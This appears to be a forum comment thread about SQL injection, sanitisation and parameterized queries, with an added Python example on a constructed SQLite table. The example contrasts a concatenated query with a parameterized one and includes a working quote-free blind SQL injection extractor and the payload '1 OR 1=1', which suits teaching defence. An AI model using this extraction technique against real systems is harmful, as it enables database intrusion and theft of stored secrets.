Comment by dataflow
2 months ago
This fails if either the UI sanitizes wildcards, or if the database prohibits them, or if it produces so much data that you can't ingest it in time, etc.
It also fails if the system was written using parameterized queries. I wouldn't expect a system to be sanitizing anything if it fails to take the most basic step for db access. This whole discussion is only relevant for systems developed by amateurs. SQL injection can only work at all if you use string concatenation to create queries, which you should never do.
Injections don't always need ''. The statements
and
if injected into a query will give different answers if SQLI exists.
There are MANY other tricks that don't involve ''.
Besides, consider the number of valid queries done by the application that involve '*'. You are not going to turn that off.
Sanitization almost always fails. This becomes an arms race.
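The two points made above, that parameterized queries remove the injection entirely and that a boolean-based injection needs no quote character at all, as an added example that is not part of this thread. It uses Python's sqlite3 module against an in-memory database with a constructed `users` table; the table, the secrets and the function names are invented for the example. `lookup_concat` pastes the caller's string into the SQL text (the amateur pattern), `lookup_param` binds it as a parameter, and `blind_extract` recovers a secret through the vulnerable function using only digits, operators and SQLite's built-in `length`, `substr` and `unicode` functions, so filtering `'` (or `*`) would not stop it.

```python
import sqlite3

# Constructed sample data for the example; nothing here comes from a real system.
ROWS = [(1, "alice", "s3cr3t-a"), (2, "bob", "s3cr3t-b"), (3, "carol", "s3cr3t-c")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_concat(conn, user_id):
    """Vulnerable: the caller's string becomes part of the SQL text and is parsed as SQL."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, user_id):
    """Hardened: the value is bound as a parameter; the SQL text is fixed and never changes."""
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))]


def probe(conn, condition):
    """Boolean oracle over the vulnerable endpoint: True when the injected
    condition holds (row 1 still comes back), False when it does not (empty result)."""
    return lookup_concat(conn, "1 AND (" + condition + ")") == ["alice"]


def blind_extract(conn, target_id, max_len=64):
    """Recover users.secret for target_id one character at a time through
    lookup_concat. Every probe is built from digits, operators and built-in
    functions only: no quote character is ever sent to the server."""
    sub = "(SELECT secret FROM users WHERE id=%d)" % target_id
    # First learn the length, then compare each character's code point.
    length = next((n for n in range(max_len + 1)
                   if probe(conn, "length(%s)=%d" % (sub, n))), None)
    if length is None:
        return None
    out = []
    for pos in range(1, length + 1):
        for code in range(32, 127):  # printable ASCII
            if probe(conn, "unicode(substr(%s,%d,1))=%d" % (sub, pos, code)):
                out.append(chr(code))
                break
        else:
            return None  # character outside the probed range
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, "1 OR 1=1"))  # every row leaks through concatenation
    print(lookup_param(db, "1 OR 1=1"))   # the same string bound as a parameter matches nothing
    print(blind_extract(db, 2))            # bob's secret, recovered without a single quote
```

With the parameterized version the string `1 OR 1=1` is compared as a value against the `id` column and matches no row, so the boolean oracle has nothing to measure; the blind extraction only works against `lookup_concat`.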
If you do it wrong, yes. Sure, there is no 100% security, but honestly, it's 2025. We already know the techniques for preventing SQL injection of any kind. I wrote about this here: https://valentin.willscher.de/posts/sql-api/
Right but the case that is being imagined here is a site that perfectly sanitises * but somehow still allows SQL injection? I don't think so.
The parser isn't shown there, so it isn't clear what would happen with weird input.
Have you had anyone do a penetration test on it?
There are trivial ways around all of those. `LIMIT 1`, `SELECT .. FROM information_schema...`, etc.
> There are trivial ways around all of those. `LIMIT 1`
LIMIT 1 limits row count. The issue here was columns. Like a giant blob someone might've stored in there.
> `SELECT .. FROM information_schema...`
no such table: information_schema.columns
> etc.
https://news.ycombinator.com/item?id=43181799
> no such table: information_schema.columns
Oh I guess I will try the other very small number of options that it could be.
> LIMIT 1 limits row count. The issue here was columns. Like a giant blob someone might've stored in there.
Come on, this is pure nonsense.